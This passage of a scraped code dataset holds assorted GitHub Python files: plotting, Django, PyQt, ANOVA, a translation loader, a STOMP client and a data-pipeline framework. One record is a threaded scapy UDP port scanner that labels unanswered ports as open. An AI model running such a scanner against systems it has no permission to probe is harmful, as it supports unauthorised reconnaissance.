\"V1_V17_0.001\", \"V1_V17_0.01\", \"V1_V17_0.1\", \"V1_V17\"]):\n omega = []\n SR = []\n file = f\"fermions_torus_spec_resp_kysym_{name}_n_6_2s_{numb_qy}_ratio_1.000000_qy_0\" \\\n f\".omega_{omega_min}-{omega_max}_eps_0.0001.sr.cut\"\n with 
open('/home/bart/PycharmProjects/response_functions/FQHETorusSpectralResponse/stripped_files/' + file, 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=' ')\n for row in plots:\n omega.append(float(row[0])+10)\n SR.append(float(row[1])/1000)\n axis.scatter(omega, SR, s=2, label=f\"${i-4}$\", marker=next(marker))\n\n axis.set_xlabel('$\\omega$')\n axis.xaxis.set_major_formatter(FormatStrFormatter('$%.3g$'))\n axis.set_ylabel('$I/10^3$')\n axis.legend(loc='upper right', handletextpad=0, borderpad=0.4, framealpha=1,\n edgecolor=None, markerscale=3,\n fontsize=10, ncol=1, labelspacing=0, columnspacing=0, title='$\\log \\\\alpha$')\n\n fig.subplots_adjust(top=0.95, bottom=0.1, right=0.95, left=0.11)\n\n\ndef plot_3d_lpv17(axis, numb_qy, omega_min, omega_max):\n\n # omega = []\n # SR = []\n\n for i, name in enumerate([\"V1_V17_0.0001\", \"V1_V17_0.001\", \"V1_V17_0.01\", \"V1_V17_0.1\", \"V1_V17\"]):\n omega = []\n SR = []\n file = f\"fermions_torus_spec_resp_kysym_{name}_n_6_2s_{numb_qy}_ratio_1.000000_qy_0\" \\\n f\".omega_{omega_min}-{omega_max}_eps_0.0001.sr.cut\"\n with open('/home/bart/PycharmProjects/response_functions/FQHETorusSpectralResponse/stripped_files/' + file, 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=' ')\n for row in plots:\n omega.append(float(row[0])+10)\n SR.append(float(row[1])/1000)\n\n V17 = [-4+i]*10000\n axis.plot(V17, omega, SR, '.', markersize=3, c=f\"C{i}\")\n\n axis.set_xlabel('$\\log \\\\alpha$')\n axis.xaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.yaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.zaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.set_ylabel('$\\\\omega$')\n axis.set_zlabel('$I/10^3$')\n\n axis.set_yticks(np.arange(-0.1, 0.11, 0.1))\n\n # Get rid of colored axes planes\n # First remove fill\n axis.xaxis.pane.fill = False\n axis.yaxis.pane.fill = False\n axis.zaxis.pane.fill = False\n\n # Now set color to white (or whatever is \"invisible\")\n axis.xaxis.pane.set_edgecolor('w')\n axis.yaxis.pane.set_edgecolor('w')\n axis.zaxis.pane.set_edgecolor('w')\n\n # Bonus: To get rid of the grid as well:\n axis.grid(False)\n\n # fig.subplots_adjust(top=1.2, bottom=0, right=1, left=-0.1, hspace=0, wspace=0)\n axis.set_position(Bbox.from_bounds(0.47, 0.01, 0.45, 1.06))\n axis.tick_params(axis='both', which='major', pad=-2)\n axis.xaxis.labelpad = -1\n axis.yaxis.labelpad = -1\n axis.zaxis.labelpad = -4\n\n\nif __name__ == \"__main__\":\n\n fig = plt.figure(figsize=(6, 2.5))\n gs = gridspec.GridSpec(1, 2, hspace=0.4, wspace=0.4)\n\n ax0 = plt.subplot(gs[0])\n plot_2d_lpv17(ax0, 18, omega_min=-100, omega_max=100)\n ax1 = plt.subplot(gs[1], projection='3d')\n plot_3d_lpv17(ax1, 18, omega_min=-100, omega_max=100)\n\n fig.text(0.03, 0.94, \"(a)\", fontsize=12)\n fig.text(0.51, 0.94, \"(b)\", fontsize=12)\n\n #fig.text(0.405, 0.8, \"$V_1$\", fontsize=11)\n #fig.text(0.79, 0.8, \"Coulomb\", fontsize=11)\n\n plt.savefig(\"/home/bart/Documents/papers/SR/lpv17.png\", bbox_inches='tight', dpi=300)\n plt.show()\n","repo_name":"bartandrews/response_functions","sub_path":"manuscript_plots/lpv17.py","file_name":"lpv17.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7586205073","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('openbeta/', views.openbeta, name='openbeta'),\n # path('admin2/',views.manage, name='manage'),\n path('admin2/',views.login, name='login'),\n path('download/image/', views.download_image, name='download_image', kwargs={'path':''}),\n]\n","repo_name":"alstja98/cloudtype-purry","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7835522496","text":"import os\nimport re\nimport sys\n\n\ndef lineInLines(line, lines, initialIndex):\n # print(\"checking for \" + line)\n for l in range(initialIndex, len(lines)):\n # print(lines[l])\n if lines[l] == line:\n return True\n return False\n\n\ndef rmDuplicateLines(filename):\n with open(filename, \"r\") as fr:\n lines = fr.readlines()\n uniqueLines = []\n i = 0\n for line in lines:\n i += 1\n if not lineInLines(line, lines, i):\n uniqueLines.append(line)\n else:\n print(line)\n print(\"let's check unique\")\n print(uniqueLines)\n with open(filename, \"w\") as fr:\n fr.writelines(uniqueLines)\n\ndef fileCatalog(fileCatal):\n rmDuplicateLines(fileCatal)\n for line in open(fileCatal, \"r\").readlines():\n rmDuplicateLines(line.rstrip(\"\\n\"))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n fileCatalog(r\"D:\\Developed\\Automation\\python\\CheckDuplicatesInTheseFiles.opml\")\n else:\n fileCatalog(sys.argv[1])\n","repo_name":"BeautyScraper/pythonUtilities","sub_path":"duplicateLineRem.py","file_name":"duplicateLineRem.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25554315777","text":"import sys\nfrom PyQt5 import QtWidgets\n\n\ndef window():\n app = QtWidgets.QApplication(sys.argv)\n win = QtWidgets.QWidget()\n\n fbox = QtWidgets.QFormLayout()\n\n # add Name field\n l1 = QtWidgets.QLabel(\"Name\")\n name = QtWidgets.QLineEdit()\n fbox.addRow(l1, name)\n\n # Add 2 line address field\n l2 = QtWidgets.QLabel(\"Address\")\n add1 = QtWidgets.QLineEdit()\n add2 = QtWidgets.QLineEdit()\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(add1)\n vbox.addWidget(add2)\n fbox.addRow(l2, vbox)\n\n # Add gender radio selection\n radio1 = QtWidgets.QRadioButton(\"Male\")\n radio2 = QtWidgets.QRadioButton(\"Female\")\n hbox = QtWidgets.QHBoxLayout()\n hbox.addWidget(radio1)\n hbox.addWidget(radio2)\n # Prevents radio2 from stretching far from radio1 with resize of window\n hbox.addStretch()\n fbox.addRow(QtWidgets.QLabel(\"sex\"), hbox)\n\n # Add Submit and Cancel Buttons\n hbox = QtWidgets.QHBoxLayout()\n hbox.addStretch()\n hbox.addWidget(QtWidgets.QPushButton(\"Submit\"))\n hbox.addWidget(QtWidgets.QPushButton(\"Cancel\"))\n fbox.addRow(hbox)\n\n win.setLayout(fbox)\n win.setWindowTitle(\"PyQt\")\n win.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n window()","repo_name":"keitht226/python_learning","sub_path":"pyqt/beginner_tutorials/qform_layout.py","file_name":"qform_layout.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25638173841","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 13:50:03 2019\n\n@author: nathanielastudillo\n\"\"\"\n\n'''\nAn ANOVA script for calculating the F value of a few samples of size n\n'''\nimport numpy as np\n\ndef ANOVA(groups): #pass in a 
\n","repo_name":"nathanielastudillo/ANOVA","sub_path":"ANOVA.py","file_name":"ANOVA.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"7948155402","text":"Lines = []\nwith open(\"d2-input.txt\", 'r') as f:\n\tfor l in f:\n\t\tLines.append(l)\n\n## Input processing ##\nimport re\nexpr = re.compile(r\"(\\d+)-(\\d+) (.): (.+)\")\nfor i in range(len(Lines)):\n\tLines[i] = expr.match(Lines[i]).groups()\n\n## Part 1 ##\nvalids = 0\nfor i, l in enumerate(Lines):\n\tif l[3].count(l[2]) in range(int(l[0]),int(l[1])+1):\n\t\tvalids += 1\n\nprint(\"## Day 2 - Part 1:\\n\\tValids:\",valids)\ninput()\n\nprint()\n## Part 2 ##\nvalids = 0\nfor i, l in enumerate(Lines):\n\tif (l[3][int(l[0])-1] == l[2]) + (l[3][int(l[1])-1] == l[2]) == 1:\n\t\tvalids += 1\n\nprint(\"## Day 2 - Part 2:\\n\\tValids:\",valids)\ninput()","repo_name":"xcnwf/AdventOfCode2020","sub_path":"day 2/d2-algo.py","file_name":"d2-algo.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"11967752395","text":"#********************************************************************************\n#--------------------------------------------------------------------------------\n#\n#\tSignificance Labs\n#\tBrooklyn, NYC\n#\n# \tAuthor: Alexandra Berke (aberke)\n# \tWritten: Summer 2014\n#\n#\n# \t/language/map.py\n#\n# Contains the actual translation data\n# Translation data comes from a publicly published Google Spreadsheet\n# Initially contains an empty map\n#\n# {\n# \tkeyname: {\n# \t\ten: \"english translation\",\n# \t\tes: \"spanish translation\",\n# \t\t... for column/language in spreadsheet\n# \t},\n# \t... for row/keyname in spreadsheet\n# }\n#\n\n# building the map.yaml file\n# grep for keys in the source:\n# `grep -R \\{\\{ '(.*)' \\| translate . 
| grep -ow '[A-Z_]\\+' | sort | uniq >> keys.txt`\n# and then build a dictionary with the key as the en: and es: values.\n# then go through the app and replace the en with the appropriate english.\n#\tGoogle documentation for accessing spreadsheet data:\n#\t\thttps://developers.google.com/gdata/samples/spreadsheet_sample\n#\n#\n#--------------------------------------------------------------------------------\n#*********************************************************************************\n\n#import requests\nimport config\nimport os\nimport yaml\nfrom collections import defaultdict\n\n# autovivification:\n# http://en.wikipedia.org/wiki/Autovivification\n# essentially, allows you to easily and dynamically build dictionaries.\nTree = lambda: defaultdict(Tree)\n# map of translations kept in \"cache\"\nmap = Tree()\n\ndef get_map():\n\tif map:\n\t\treturn map\n\treturn build_map()\n\ndef build_map():\n\t# re-initialize map\n\tmap = Tree()\n\n\t# get pwd\n\tscript_dir = os.path.dirname(__file__)\n\n\t# load all supported languages.\n\tfor lang in config.SUPPORTED_LANGUAGES:\n\t\t# relative to pwd\n\t\trel_path = \"./translations/{0}.yaml\".format(lang)\n\t\t# yaml format:\n\t\t# KEY_NAME: \"value\"\n\n\t\ttranslation_path = os.path.join(script_dir, rel_path)\n\t\tyaml_string = open(translation_path)\n\t\tlang_map = yaml.safe_load(yaml_string)\n\t\tyaml_string.close()\n\t\tfor key,value in lang_map.iteritems():\n\t\t\tmap[key][lang]=value # autovivification in action.\n\n\treturn map\n\nmap = build_map()","repo_name":"aberke/check-list","sub_path":"app/language/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"27850523830","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n    Simple port scanner\r\n    UDP scan\r\n\r\n\"\"\"\r\nfrom scapy.all import *\r\nfrom scapy.layers.inet import IP, UDP \r\nimport threading\r\n\r\ntarget=\"127.0.0.1\"\r\na=int(input(\"Enter the start port: \"))\r\nb=int(input(\"Enter the end port: \"))\r\nportslist=(list(range(a,b)))\r\n'''\r\nportslist=[21, 22, 34, 135, 139, 80, 445]\r\n'''\r\ndef UDP_scan(target,port):\r\n    pkt=IP(dst=target)/UDP(dport=int(port))\r\n    res=sr1(pkt,timeout=0.1,verbose=0)\r\n    # no reply to the UDP probe; strictly this means open|filtered, reported here as open\r\n    if res==None:\r\n        print(f\"[+] Port {str(port)} Is Open\\n\")\r\n\r\ndef udp_scanner(target,portslist):\r\n    print(f\"Scanning {target} for Open UDP Ports\\n\")\r\n    for port in portslist:\r\n        t=threading.Thread(target=UDP_scan,args=(target,port))\r\n        t.start()\r\n\r\nif __name__=='__main__':\r\n    udp_scanner(target,portslist)\r\n","repo_name":"OREOo-o/Port-Scanner","sub_path":"UDP.py","file_name":"UDP.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"11465201367","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport hashlib\r\nfrom urllib.parse import *\r\nimport aiohttp\r\nimport asyncio\r\nfrom loguru import *\r\nfrom app.plugins.proxy.tools import *\r\nfrom app.conf.config import *\r\n\r\n\r\nasync def get4gtvurl(fsid):\r\n    _a = now_time()\r\n    url = urljoin(data3['a3'], \"?type=v5\".format(fsid))\r\n    data = {\"t\": _a - tx, \"fid\": fsid, \"v\": config.VERSION}\r\n    header = {\r\n        \"Accept\": \"*/*\",\r\n        \"User-Agent\": machine,\r\n        \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\r\n        \"v\": hashlib.md5(bytes(str(data) + mdata, 'utf8')).hexdigest(),\r\n    }\r\n    async with aiohttp.ClientSession() as session:\r\n        async with session.post(url=url, data=data, 
headers=header) as res:\r\n            logger.success(f\"{fsid} {res.status}\")\r\n            try:\r\n                _ = await res.json()\r\n                return res.status, data[\"xx\"], data['xxxxx'], _a, \"xxxx\"\r\n            except:\r\n                return res.status, None, res.xxx, _a, \"\"\r\n\r\n\r\n","repo_name":"239144498/ProxyURL","sub_path":"app/plugins/proxy/endecrypt.py","file_name":"endecrypt.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"63"}
{"seq_id":"2798529780","text":"\"\"\"\nAn example demonstrating a publish-subscribe usage of stompclient.\n\nIn this example it is necessary to start a thread listener loop to receive the\nframes from the server. When the listener loop is running other \"response\" \nframes, such as the CONNECTED frame, will also be returned by the \nPublishSubscribeClient.\n\"\"\"\nimport threading\nimport logging\nimport time\nimport pickle\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nfrom stompclient import PublishSubscribeClient\n\ndef frame_received(frame):\n    # Do something with the frame!\n    payload = pickle.loads(frame.body)\n    logger.info(\"Received data: {0!r}\".format(payload))\n\nclient = PublishSubscribeClient('127.0.0.1', 61613)\nlistener = threading.Thread(target=client.listen_forever, name='Frame-Receiver')\nlistener.start()\n\n# For our example, we want to wait until the server is actually listening\nclient.listening_event.wait()\n\ntry:\n    result = client.connect()\n    logger.info(\"Got session response from connect: {0}\".format(result.session))\n    client.subscribe(\"/queue/example\", frame_received)\n    \n    while True:\n        time.sleep(1.0)\n    \nfinally:\n    client.shutdown_event.set()\n    listener.join()","repo_name":"hozn/stompclient","sub_path":"examples/subscriber_thread.py","file_name":"subscriber_thread.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"34207080067","text":"#!/usr/bin/env python\n\"\"\"recipy - a frictionless provenance tool for Python\n\nUsage:\n    recipy search [options] <outputfile>\n    recipy latest [options]\n    recipy gui [options]\n    recipy (-h | --help)\n    recipy --version\n\nOptions:\n    -h --help        Show this screen\n    --version        Show version\n    -a --all         Show all results (otherwise just latest result given)\n    -f --fuzzy       Use fuzzy searching on filename\n    -r --regex       Use regex searching on filename\n    -i --id          Search based on (a fragment of) the run ID\n    -v --verbose     Be verbose\n    -d --diff        Show diff\n    --debug          Turn on debugging mode\n\n\"\"\"\nimport os\nimport re\nimport sys\n\nfrom docopt import docopt\nfrom pprint import pprint\nfrom jinja2 import Template\nfrom tinydb import TinyDB, where\nfrom dateutil.parser import parse\nimport six\n\nfrom . 
import __version__\nfrom recipyCommon import config, utils\n\n\ndb = utils.open_or_create_db()\n\n\ndef print_result(r):\n    # Print a single result from the search\n    template = \"\"\"Run ID: {{ unique_id }}\nCreated by {{ author }} on {{ date }} UTC\nRan {{ script }} using {{ command }}\n{% if command_args|length > 0 %}\nUsing command-line arguments: {{ command_args }}\n{% endif %}\n{% if gitcommit is defined %}\nGit: commit {{ gitcommit }}, in repo {{ gitrepo }}, with origin {{ gitorigin }}\n{% endif %}\nEnvironment: {{ environment|join(\", \") }}\n{% if exception is defined %}\nException: ({{ exception.type }}) {{ exception.message }}\n{% endif %}\n{% if inputs|length == 0 %}\nInputs: none\n{% else %}\nInputs:\n{% for input in inputs %}\n  {{ input }}\n{% endfor %}\n{% endif %}\n{% if outputs | length == 0 %}\nOutputs: none\n{% else %}\nOutputs:\n{% for output in outputs %}\n  {{ output }}\n{% endfor %}\n{% endif %}\"\"\"\n    template = Template(template, trim_blocks=True)\n    print(template.render(**r))\n\n\ndef main():\n    \"\"\"\n    Main function for recipy command-line script\n    \"\"\"\n    args = docopt(__doc__, version='recipy v%s' % __version__)\n\n    if args['--debug']:\n        print('Command-line arguments: ')\n        print(args)\n        print('DB path: ', config.get_db_path())\n        print('')\n        print('Full config file (as interpreted):')\n        print('----------------------------------')\n        conf = config.read_config_file()\n        s = six.StringIO()\n        conf.write(s)\n        print(s.getvalue())\n        print('----------------------------------')\n\n\n    if args['search']:\n        search(args)\n    elif args['latest']:\n        latest(args)\n    elif args['gui']:\n        gui(args)\n\ndef gui(args):\n    \"\"\"\n    Loads recipy GUI from the command-line\n    \"\"\"\n    from recipyGui import recipyGui\n    import threading, webbrowser, socket\n\n    def get_free_port():\n        s = socket.socket()\n        s.bind(('', 0))\n        port = s.getsockname()[1]\n        s.close()\n        return port\n\n    port = get_free_port()\n    url = \"http://127.0.0.1:{0}\".format(port)\n\n    # Give the application some time before it starts\n    threading.Timer(1.25, lambda: webbrowser.open(url) ).start()\n\n    # Turn off reloading by setting debug = False (this also fixes starting the\n    # application twice)\n    recipyGui.run(debug = args['--debug'], port=port)\n\ndef latest(args):\n    results = db.all()\n\n    results = [_change_date(result) for result in results]\n\n    # Sort the results\n    results = sorted(results, key = lambda x: parse(x['date']))\n\n    print_result(results[-1])\n\n    if args['--diff']:\n        if 'diff' in results[-1]:\n            print(\"\\n\\n\")\n            print(results[-1]['diff'])\n\n    db.close()\n\ndef search(args):\n    filename = args['<outputfile>']\n\n    if args['--fuzzy']:\n        results = db.search(where('outputs').any(lambda x: re.match(\".+%s.+\" % filename, x)))\n    elif args['--regex']:\n        results = db.search(where('outputs').any(lambda x: re.match(filename, x)))\n    elif args['--id']:\n        results = db.search(where('unique_id').matches('%s.+' % filename))\n        # Automatically turn on display of all results so we don't misleadingly\n        # suggest that their shortened ID is unique when it isn't\n        args['--all'] = True\n    else:\n        results = db.search(where('outputs').any(os.path.abspath(filename)))\n\n    results = [_change_date(result) for result in results]\n\n    # Sort the results\n    results = sorted(results, key = lambda x: parse(x['date']))\n\n    if len(results) == 0:\n        print(\"No results found\")\n    else:\n        if args['--all']:\n            for r in results[:-1]:\n                print_result(r)\n                print(\"-\"*40)\n            print_result(results[-1])\n        else:\n            print_result(results[-1])\n            if len(results) > 1:\n                print(\"** 
Previous runs creating this output have been found. Run with --all to show. **\")\n\n    if args['--diff']:\n        if 'diff' in results[-1]:\n            print(\"\\n\\n\")\n            print(results[-1]['diff'])\n\n    db.close()\n\ndef _change_date(result):\n    result['date'] = result['date'].replace('{TinyDate}:', '')\n    return result\n\nif __name__ == '__main__':\n    main()\n","repo_name":"musically-ut/recipy","sub_path":"recipyCmd/recipycmd.py","file_name":"recipycmd.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"}
{"seq_id":"4133267350","text":"from typing import List\nfrom heapq import heappush, heappop  # provided implicitly by the LeetCode runtime\n\n\nclass Solution:\n    def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n        # kth smallest in an n x n sorted matrix:\n        # push every value negated (a min-heap of negatives acts as a max-heap),\n        # then pop until only the k smallest values remain;\n        # heap[0] is then the negated kth smallest\n        \n        heap = []\n        \n        for nums in matrix:\n            for num in nums:\n                heappush(heap, num*-1)\n        \n        while len(heap) > k:\n            heappop(heap)\n\n\n        return heap[0] * -1\n    \n    ","repo_name":"NathanZlion/Competitive-Programming","sub_path":"0378-kth-smallest-element-in-a-sorted-matrix/0378-kth-smallest-element-in-a-sorted-matrix.py","file_name":"0378-kth-smallest-element-in-a-sorted-matrix.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"}
{"seq_id":"35116574448","text":"import argparse\nimport datetime\nimport os\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Union\nimport attr\nfrom collections import OrderedDict\n\nfrom loguru import logger\n\nimport hail as hl\n\nfrom data_pipeline.config import PipelineConfig\n\n\nclass GoogleCloudStorageFileSystem:\n    def exists(self, path): # pylint: disable=no-self-use\n        return hl.hadoop_exists(path)\n\n    def modified_time(self, path): # pylint: disable=no-self-use\n        # The Hail docs say that stat[\"modification_time\"] should be a string,\n        # but in the case of Google Cloud Storage, it returns an epoch timestamp\n        # as an int. 
There is a Google Cloud Storage filesystem in the Hail\n        # backend, but no Python bindings for it as of yet; when those bindings\n        # exist, we should probably use that filesystem here instead of a\n        # generic Hadoop FS.\n        stat = hl.hadoop_stat(path)\n        return stat[\"modification_time\"]\n\n\nclass LocalFileSystem:\n    def exists(self, path): # pylint: disable=no-self-use\n        return os.path.isfile(path)\n\n    def modified_time(self, path): # pylint: disable=no-self-use\n        stat_result = os.stat(path)\n        return datetime.datetime.fromtimestamp(stat_result.st_mtime)\n\n\ndef file_exists(path):\n    file_system = GoogleCloudStorageFileSystem() if path.startswith(\"gs://\") else LocalFileSystem()\n    check_path = path + \"/_SUCCESS\" if path.endswith(\".ht\") else path\n    return file_system.exists(check_path)\n\n\ndef modified_time(path):\n    file_system = GoogleCloudStorageFileSystem() if path.startswith(\"gs://\") else LocalFileSystem()\n    check_path = path + \"/_SUCCESS\" if path.endswith(\".ht\") else path\n    return file_system.modified_time(check_path)\n\n\n_pipeline_config = {}\n\n\n@attr.define\nclass DownloadTask:\n    _config: Optional[PipelineConfig]\n    _name: str\n    _url: str\n    _output_path: str\n\n    @classmethod\n    def create(cls, config: Optional[PipelineConfig], name: str, url: str, output_path: str):\n        return cls(config, name, url, output_path)\n\n    def get_output_path(self):\n        if self._config:\n            return self._config.output_root + self._output_path\n        else:\n            return _pipeline_config[\"output_root\"] + self._output_path\n\n    def should_run(self):\n        output_path = self.get_output_path()\n        if not file_exists(output_path):\n            return (True, \"Output does not exist\")\n\n        return (False, None)\n\n    def get_inputs(self):\n        raise NotImplementedError(\"Method not valid for DownloadTask\")\n\n    def run(self, force=False):\n        output_path = self.get_output_path()\n        should_run, reason = (True, \"Forced\") if force else self.should_run()\n        if should_run:\n            logger.info(f\"Running {self._name} ({reason})\")\n\n            start = time.perf_counter()\n            with tempfile.NamedTemporaryFile() as tmp:\n                subprocess.check_call([\"curl\", \"-o\", tmp.name, self._url])\n\n                if output_path.startswith(\"gs://\"):\n                    subprocess.check_call([\"gsutil\", \"cp\", tmp.name, output_path])\n                else:\n                    shutil.copyfile(tmp.name, output_path)\n\n            stop = time.perf_counter()\n            elapsed = stop - start\n            logger.info(f\"Finished {self._name} in {int(elapsed // 60)}m{int(elapsed % 60):02d}s\")\n        else:\n            logger.info(f\"Skipping {self._name}\")\n\n\n@attr.define\nclass Task:\n    _name: str\n    _task_function: Callable\n    _output_path: str\n    _inputs: dict\n    _params: dict\n    _config: Optional[PipelineConfig] = None\n\n    @classmethod\n    def create(\n        cls,\n        config: Optional[PipelineConfig],\n        name: str,\n        task_function: Callable,\n        output_path: str,\n        inputs: Optional[dict] = None,\n        params: Optional[dict] = None,\n    ):\n        if inputs is None:\n            inputs = {}\n        if params is None:\n            params = {}\n        return cls(name, task_function, output_path, inputs, params, config)\n\n    def get_output_path(self):\n        if self._config:\n            return os.path.join(self._config.output_root, self._output_path)\n        else:\n            return _pipeline_config[\"output_root\"] + self._output_path\n\n    def get_inputs(self):\n        paths = {}\n\n        for k, v in self._inputs.items():\n            if isinstance(v, (Task, DownloadTask)):\n                paths.update({k: v.get_output_path()})\n            else:\n                if self._config:\n                    if self._config.input_root:\n                        paths.update({k: os.path.join(self._config.input_root, v)})\n                    if \"gs://\" in v:\n                        paths.update({k: v})\n                else:\n
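                    # no config at all: leave the caller-supplied path untouched\n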
                    paths.update({k: v})\n\n        return paths\n\n    def should_run(self):\n        output_path = self.get_output_path()\n        if not file_exists(output_path):\n            return (True, \"Output does not exist\")\n\n        if self._inputs:\n            output_mod_time = modified_time(output_path)\n            input_mod_time = max(modified_time(path) for path in self.get_inputs().values())\n\n            if input_mod_time > output_mod_time:\n                return (True, \"Input is newer than output\")\n\n        return (False, None)\n\n    def run(self, force=False):\n        output_path = self.get_output_path()\n        should_run, reason = (True, \"Forced\") if force else self.should_run()\n        if should_run:\n            logger.info(f\"Running {self._name} ({reason})\")\n            start = time.perf_counter()\n            result = self._task_function(**self.get_inputs(), **self._params)\n\n            if self._config:\n                if \"gs://\" not in self._config.output_root:\n                    Path(self._config.output_root).mkdir(parents=True, exist_ok=True)\n\n            result.write(output_path, overwrite=True) # pylint: disable=unexpected-keyword-arg\n            stop = time.perf_counter()\n            elapsed = stop - start\n            logger.info(f\"Finished {self._name} in {int(elapsed // 60)}m{int(elapsed % 60):02d}s\")\n        else:\n            logger.info(f\"Skipping {self._name}\")\n\n\n@attr.define\nclass Pipeline:\n    config: Optional[PipelineConfig] = None\n    _tasks: OrderedDict = OrderedDict()\n    _outputs: dict = {}\n\n    def add_task(\n        self,\n        name: str,\n        task_function: Callable,\n        output_path: str,\n        inputs: Optional[dict] = None,\n        params: Optional[dict] = None,\n    ):\n        if inputs is None:\n            inputs = {}\n        if params is None:\n            params = {}\n        task = Task.create(self.config, name, task_function, output_path, inputs, params)\n        self._tasks[name] = task\n        return task\n\n    def add_download_task(self, name, *args, **kwargs) -> DownloadTask:\n        task = DownloadTask.create(self.config, name, *args, **kwargs)\n        self._tasks[name] = task\n        return task\n\n    def get_task(self, name: str) -> Union[Task, DownloadTask]:\n        try:\n            return self._tasks[name]\n        except KeyError as error:\n            raise ValueError(f\"Pipeline contains no task named '{name}'\") from error\n\n    def get_all_task_names(self) -> List[str]:\n        return list(self._tasks.keys())\n\n    def run(self, force_tasks=None) -> None:\n        for task_name, task in self._tasks.items():\n            task.run(force=force_tasks and task_name in force_tasks)\n\n    def set_outputs(self, outputs) -> None:\n        for output_name, task_name in outputs.items():\n            assert task_name in self._tasks, f\"Unable to set output '{output_name}', no task named '{task_name}'\"\n\n        self._outputs = outputs\n\n    def get_output(self, output_name) -> Union[Task, DownloadTask]:\n        task_name = self._outputs[output_name]\n        return self._tasks[task_name]\n\n\n@attr.define\nclass PipelineMock:\n    output_mappings: Dict[str, str]\n\n    @classmethod\n    def create(cls, output_mappings: Dict[str, str]):\n        return cls(output_mappings)\n\n    def get_output(self, output_name):\n        if output_name in self.output_mappings:\n            return self.output_mappings.get(output_name)\n        raise ValueError(\"Output name is not valid\")\n\n\ndef run_pipeline(pipeline: Pipeline):\n    task_names = pipeline.get_all_task_names()\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--output-root\")\n    group = parser.add_mutually_exclusive_group()\n    group.add_argument(\"--force\", choices=task_names, nargs=\"+\")\n    group.add_argument(\"--force-all\", action=\"store_true\")\n    args = parser.parse_args()\n\n    if args.output_root:\n        _pipeline_config[\"output_root\"] = args.output_root.rstrip(\"/\")\n\n    pipeline_args = {}\n    if args.force_all:\n        pipeline_args[\"force_tasks\"] = task_names\n    elif 
args.force:\n pipeline_args[\"force_tasks\"] = args.force\n\n hl.init()\n\n pipeline.run(**pipeline_args)\n","repo_name":"broadinstitute/gnomad-browser","sub_path":"data-pipeline/src/data_pipeline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":8984,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"63"} +{"seq_id":"16209599946","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nfrom functools import partial\nimport collections\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils.html import strip_tags\nfrom django.utils.translation import ugettext, ugettext_lazy as _, ungettext\n\nimport django.forms.models\n\nfrom cms.models.pluginmodel import CMSPlugin\nimport cms.models\nimport cms.models.fields\n\nfrom djangocms_attributes_field.fields import AttributesField\nimport djangocms_text_ckeditor.fields\nimport filer.fields.file\nimport filer.fields.image\nimport filer.fields.folder\n\nfrom . import model_fields, constants, utils\n\n\n##########\n# Mixins # do NOT use outside of this package!\n########## Because changes here might require Database migrations!\nimport os\n\n\nCMSPluginField = partial(\n models.OneToOneField,\n to=CMSPlugin,\n related_name='+',\n parent_link=True,\n)\n\n\nclass LinkMixin(models.Model):\n link_url = models.URLField(_(\"link\"), blank=True, default='')\n link_page = cms.models.fields.PageField(\n verbose_name=_(\"page\"),\n blank=True,\n null=True,\n on_delete=models.SET_NULL\n )\n link_file = filer.fields.file.FilerFileField(\n verbose_name=_(\"file\"),\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n link_anchor = models.CharField(\n _(\"anchor\"), max_length=128, blank=True,\n help_text=_(\"Adds this value as an anchor 